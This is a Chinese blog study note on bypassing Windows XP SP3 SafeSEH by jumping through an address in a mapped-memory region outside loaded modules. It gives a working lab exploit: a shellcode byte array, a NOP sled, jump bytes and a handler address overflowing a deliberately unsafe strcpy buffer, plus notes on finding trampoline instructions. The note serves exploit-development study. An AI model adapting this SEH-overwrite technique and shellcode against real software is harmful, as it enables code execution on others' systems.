利用加载模块之外的地址绕过SafeSEH

最新推荐文章于 2022-10-28 22:32:27 发布
最新推荐文章于 2022-10-28 22:32:27 发布
阅读量1k 收藏
点赞数
分类专栏: 漏洞基础学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zcc1414/article/details/11598151
版权 

/*
XP SP3   
VS2008   SafeSEH 保护  
利用程序的  map状态的的映射文件
把它当成跳板  跳向我们的shellcode执行
*/
#include <stdafx.h>
#include <windows.h>

char shellcode[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53"
"\x68\x64\x61\x30\x23"
"\x68\x23\x50\x61\x6E"
"\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8"//168

"\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90"

"\xE9\x29\xFF\xFF\xFF\x90\x90\x90\xEB\xF6"

"\x0B\x0B\x28\x00"
;


DWORD MyException(void)
{
	printf("There is an exception");
	getchar();
	return 1;
}
void test(char * input)
{
	char str[200];
	strcpy(str,input);	
	int zero=0;
	__try
	{
		zero=1/zero;
	}
	__except(MyException())
	{
	}
}
int _tmain(int argc, _TCHAR* argv[])
{
	//__asm int 3
		test(shellcode);
	return 0;
}

ctrl+M  可以看到除了  EXE 和DLL模块之外的内存映射(类型为mao) 可以无视  SafeSEH的


下载插件 OllyFindAddr 可以在整个程序内存空间搜索    call/jmp dword ptr[ebp+n]

http://bbs.pediy.com/showthread.php?t=136464


如果SEH是这个地址的话   恰好  可以调到  SEH的下一指针上


我们寻找的地址跳向    -》 SEH下一指针   然后这个指针上           不能直接跳向shellcode    

因为直接  EB xxxxxxx  是5字节  会淹没我们的 SEH  那就会失败了

所以只有向上跳8字节     然后再跳向 shellcode起始地址就行了


pandamac
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
突破SafeSEH机制之一——利用绕过SafeSEH
Yx0051的博客
08-05 776
文章是发在吾爱破解的,这里直接转过来了 我也是个新手,刚学漏洞调试,发现要学的东西太多,想要把漏洞学好,必须精通各类系统底层机制,汇编,PE等等等等太多太多,所以不可能把这些东西都学会了,再去调试漏洞,只能一步步慢慢从简单开始,另外也要学会忽略那些你现在所力不能及的地方,如果实在不懂,就跳过,可能到哪一天你忽然就明白了。所以这里,也是希望同学们想学习的不要被这个东西吓到,静下心来慢慢看,如果有不
突破SafeSEH机制之三——利用加载模块之外地址绕过SafeSEH
Yx0051的博客
08-09 744
敲黑板敲黑板~睡着的同学醒醒了!! 今天我们继续突破SafeSEH,上次讲到第二种思路利用启用SafeSEH模块绕过SafeSEH 今天来实现最后一个突破思路:       异常处理函数位于加载模块内存范围之外,DEP关闭------->>>在加载模块内存范围外找一个跳板指令就可以转入shellcode执行 上次我们是找到了一个加载模块内存范围内找到的一个指令,今天我们要在加载内存范围外
利用加载模块之外地址绕过 SafeSEH
weixin_30906671的博客
03-10 122
环境: xp ps3 VS 2008 release版本, 禁用优化 IDA OD 参考: 跳板 : http://blog.csdn.net/chenchong_219/article/details/17973935 ebp+x030是什么: https://www.cnblogs.com/LittleHann/p/3177829.html?utm_source=tuicool&utm...
8.3 利用加载模块之外地址绕过SafeSEH
qq_55202378的博客
10-28 1516
SafeSEH
PESecurity:PowerShell模块,用于检查是否已使用ASLR,DEP,SafeSEH,StrongNaming和Authenticode编译Windows二进制(EXEDLL)
03-03
用于检查Windows二进制文件(EXE / DLL)是否已通过ASLR,DEP,SafeSEH,StrongNaming,Authenticode,Control Flow Guard和HighEntropyVA编译的PowerShell脚本。 Import the module Import-Module .\Get-...
ExploitDev:各种ASM,C和C ++工具,shellcode和利用实验
03-30
ExploitDev:各种ASM,C和C ++工具,shellcode和利用实验
从零开始学习软件漏洞挖掘系列教程第五篇:突破SafeSeh防线1
08-03
1实验简介实验所属系列:系统安全实验对象: 本科/专科信息安全专业相关课程及专业: 计算机网络实验时数(学分):2 学时实验类别: 实践实验类2 实 验目的通过
软件漏洞利用缓解及其对抗技术演化 (2011年)
04-27
该文总结了近十几年来,堆保护、地址随机化、沙箱保护等相关技术及研究的进展情况。重点探讨了栈保护技术攻防两端,针对GS、SafeSEH等前后历经的三轮对抗过程。围绕ROP、DeActive、Spray等3个方面的突破与反制,详细...
checksec:用于ASLRDEPSafeSEH检查的windbg扩展
05-18
checksec - Check modules ASLR/DEP/SafeSEH settings 0:001> .load C:\Users\debug\Desktop\checksec\Debug\checksec.dll0:001> !checksecImage Base Size ASLR DEP Safe SEH Module Name 0x00740000 0x00030000...
SafeSEH原理及绕过技术浅析
热门推荐
magictong的专栏
04-27 1万+
SafeSEH原理及绕过技术浅析     作者:magictong 时间:2012年3月16日星期五   摘要:主要介绍SafeSEH的基本原理和SafeSEH绕过技术,重点在原理介绍。 关键词:SafeSEH绕过技术;异常处理   目录 前言 SafeSEH的保护原理 (1)      二进制层面 (2)      系统层面 怎么关掉编译器的SafeSEH支持
SafeSEH基本概念+ 从堆区绕过SafeSEH学习
weixin_30628077的博客
09-09 118
SafeSEH 原理:在程序调用异常处理函数前,对要调用的的异常处理函数进行一系列的有效性检测 VS2003后续版本 默认启用的 编译器将所有的额SEH中所有的异常处理函数的值提取出来编入一张安全SEH 表 将这张表放到程序的映像中 当程序调用异常处理的时候会将函数地址与安全SEH表进行匹配 检查调用的异常处理函数是否位于安全SEH表 VS2008 命令行: 好像只有rele...
0day 第11章--11.6节:利用加载模块之外地址绕过SafeSEH
I have a dream
10-10 187
实验环境:winxp sp3 vs2010 总结一下入的坑: (1) 变量zero的位置必须在strcpy()的后面,不然strcpy之后会将zero的值覆盖掉,导致zero不为0,触发不了异常。 void test(char * input) { char str[200]; strcpy(str,input); int zero=0; __try{ zero = 1/zer...
利用 SEH 机制 Exploit it
新博客:https://aping-dev.com/
05-31 1170
有漏洞的源码: #include<windows.h> #include<string.h> #include<stdio.h> void test(char *str) { char buf[8]; strcpy(buf,str); } int main() { FILE *fp; int i; char str[30000]; LoadLib...
<Oday安全 11.6利用加载模块之外地址绕过SafeSEH>一节注记---jmp [ebp+N] (上)
lixiangminghate的专栏
01-10 973
看到这一章我又抓狂了:作者提及从进程空间类型为Map的映射文件中寻找如下指令地址: call/jmp dword ptr[esp+0x8] call/jmp dword ptr[esp+0x14] call/jmp dword ptr[esp+0x1c] call/jmp dword ptr[esp+0x2c] call/jmp dword ptr[esp+0x44] call/jmp dwor
ImmunityDebugger 学习
zcc1414的专栏
03-12 6585
Immunity  Debugger软件专门用于加速漏洞利用程序的开发,辅助漏洞挖掘以 及恶意软件分析。它具备一个完整的图形用户界面,同时还配备了迄今为止最为 强的python安全工具库。它巧妙的将动态调试功能与一个强大的静态分析引擎融 合于一体,它还附带了一套高度可定制的纯python图形算法,可用于帮助我们绘 制出直观的函数体控制流以及函数中的各个基本块。 只是学习记录,别无
ASLR 基本概念
zcc1414的专栏
09-17 4255
ASLR (Address Space Layout Randomization) 通过加载程序时候不再使用固定的基址加载,从而干扰shellcode定位的一种保护机制 windows Vista出现后,ASLR 才真正开始发挥作用 VS2005 添加 /dynmicbase 就可以支持 ASLR VS2008 linker->Randomized Base Address 设置 包含
Ret2Libc学习NtSetInformationProcess DEP
zcc1414的专栏
09-15 3545
程序跳向非可执行代码上   DEP保护下溢出失败 Ret2libc (Return to libc) 原理  :   跳向一个已经存在的系统函数,DEP不会拦截 。 1) ZwSetInformationProcess函数将DEP关闭后再转入 shellcode执行 2)VirtualProtect 函数来将shellcode所在内存页设置为可执行,再转入shellcode执行 3)Vir
vs2022怎么开safeSEH
最新发布
03-27
在Visual Studio 2022中,开启SafeSEH(Safe Structured Exception Handling)可以提高应用程序的安全性,防止恶意代码利用异常处理机制进行攻击。下面是在VS2022中开启SafeSEH的步骤: 1. 打开你的项目,在解决...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值